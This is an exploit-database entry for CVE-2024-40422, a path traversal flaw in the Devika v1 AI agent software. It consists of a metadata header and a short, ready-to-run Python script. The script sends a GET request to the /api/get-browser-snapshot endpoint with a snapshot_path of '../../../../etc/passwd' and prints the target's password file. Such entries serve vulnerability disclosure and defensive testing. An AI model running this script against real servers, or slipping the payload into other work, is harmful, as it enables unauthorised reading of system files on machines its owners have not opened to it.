Share
## https://sploitus.com/exploit?id=PACKETSTORM:179904
# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter  
# Google Dork: N/A  
# Date: 2024-06-29  
# Exploit Author: Alperen Ergel  
# Contact: @alpernae (IG/X)  
# Vendor Homepage: https://devikaai.co/  
# Software Link: https://github.com/stitionai/devika  
# Version: v1  
# Tested on: Windows 11 Home Edition  
# CVE: CVE-2024-40422  
  
#!/usr/bin/python  
  
import argparse  
import requests  
  
def exploit(target_url):  
url = f'http://{target_url}/api/get-browser-snapshot'  
params = {  
'snapshot_path': '../../../../etc/passwd'  
}  
  
response = requests.get(url, params=params)  
print(response.text)  
  
if __name__ == "__main__":  
parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')  
parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)  
args = parser.parse_args()  
  
exploit(args.target)